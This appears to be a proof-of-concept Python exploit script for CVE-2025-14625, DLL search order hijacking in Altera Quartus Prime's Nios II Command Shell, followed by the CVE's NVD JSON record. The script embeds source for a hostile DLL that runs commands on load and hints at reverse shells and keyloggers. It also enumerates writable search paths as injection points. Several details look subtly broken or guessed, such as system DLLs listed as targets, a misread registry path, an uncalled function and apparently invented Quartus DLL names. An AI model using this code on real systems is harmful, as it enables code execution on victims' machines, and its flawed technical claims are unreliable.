CVE-2025-14625

#!/usr/bin/env python3 """ CVE-2025-14625 PoC - DLL Search Order Hijacking Target: Altera Quartus Prime Nios II Command Shell (Windows) Author: Security Research """ import os import ctypes from ctypes import wintypes # Malicious DLL that will be loaded instead of legitimate DLL MALICIOUS_DLL_CODE = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Execute malicious payload system("cmd.exe /c whoami > C:\\\\Temp\\\\poc_output.txt"); // Or execute reverse shell, keylogger, etc. } return TRUE; } ''' def create_malicious_dll(dll_path, target_dll_name): """ Create a malicious DLL with the same name as the target DLL Place it in a location that will be searched before the legitimate DLL """ # Common DLL names that Quartus Nios II Command Shell might load common_dlls = [ "msvcr120.dll", "msvcp120.dll", "kernel32.dll", "user32.dll", "advapi32.dll" ] # Check if target DLL is in the list of commonly loaded DLLs if target_dll_name.lower() in [dll.lower() for dll in common_dlls]: print(f"[*] Target DLL '{target_dll_name}' is a common system DLL") print(f"[*] Creating malicious DLL at: {dll_path}") # In real attack scenario, compile the DLL with malicious code # For demonstration, create a placeholder with open(dll_path, 'wb') as f: f.write(b'MZ' + b'\x00' * 58 + b'\x90' * 64) print(f"[+] Malicious DLL created successfully") return True else: print(f"[-] Target DLL '{target_dll_name}' is not a common DLL") return False def check_dll_search_order(): """ Check the DLL search order on Windows """ print("[*] Checking DLL Search Order Configuration") # Check if Safe DLL Search Mode is enabled try: import winreg key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode" ) value, _ = winreg.QueryValueEx(key, "") winreg.CloseKey(key) if value == 1: print("[+] Safe DLL Search Mode is ENABLED") else: print("[-] Safe DLL Search Mode is DISABLED - More vulnerable") except: print("[-] Could not determine Safe DLL Search Mode status") def enumerate_dll_search_paths(): """ Enumerate paths where DLLs might be searched """ paths = [] # Application directory app_dir = os.path.dirname(os.sys.executable if __name__ == "__main__" else "") paths.append(app_dir) # System directory system_dir = os.environ.get('SystemRoot', 'C:\\Windows') + '\\System32' paths.append(system_dir) # Windows directory windows_dir = os.environ.get('SystemRoot', 'C:\\Windows') paths.append(windows_dir) # PATH environment variable path_env = os.environ.get('PATH', '') paths.extend(path_env.split(';')) print("[*] DLL Search Paths:") for i, path in enumerate(paths): print(f" {i+1}. {path}") return paths def main(): print("=" * 60) print("CVE-2025-14625 - DLL Search Order Hijacking PoC") print("Target: Altera Quartus Prime Nios II Command Shell") print("=" * 60) # Check system configuration check_dll_search_order() # Enumerate DLL search paths paths = enumerate_dll_search_paths() # Identify potential injection points print("\n[*] Potential DLL injection points:") for path in paths: if os.path.exists(path) and os.access(path, os.W_OK): print(f" [!] Writable: {path}") # Target DLL names commonly used by Quartus target_dlls = [ "nios2gcc.dll", "nios2eds.dll", "QuartusPrime.dll" ] print("\n[*] Target DLLs for Quartus Prime:") for dll in target_dlls: print(f" - {dll}") print("\n[!] Note: This is a PoC for educational purposes only") print("[!] Always obtain proper authorization before testing") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14625", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T12:16:55.637", "lastModified": "2026-01-28T23:15:50.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard on Windows (Nios II Command Shell modules), Altera Quartus Prime Lite on Windows (Nios II Command Shell modules) allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 19.1 through 24.1; Quartus Prime Lite: from 19.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de elemento de ruta de búsqueda no controlado en Altera Quartus Prime Standard en Windows (módulos Nios II Command Shell), Altera Quartus Prime Lite en Windows (módulos Nios II Command Shell) permite el secuestro del orden de búsqueda. Este problema afecta a Quartus Prime Standard: desde 19.1 hasta 24.1; Quartus Prime Lite: desde 19.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "19.1", "versionEndExcluding": "25.1", "matchCriteriaId": "79B62FFE-9FDE-4957-8BA3-B226E50B5989"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "19.1", "versionEndExcluding": "25.1", "matchCriteriaId": "C81184B9-6426-4D39-8CCE-4045126738B2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://community.altera.com/kb/knowledge-base/how-to-mitigate-the-security-vulnerability-in-the-nios%C2%AE-ii-command-shell-utility/350185", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447"}, {"url": "https://www.altera.com/security/security-advisory/asa-0005", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}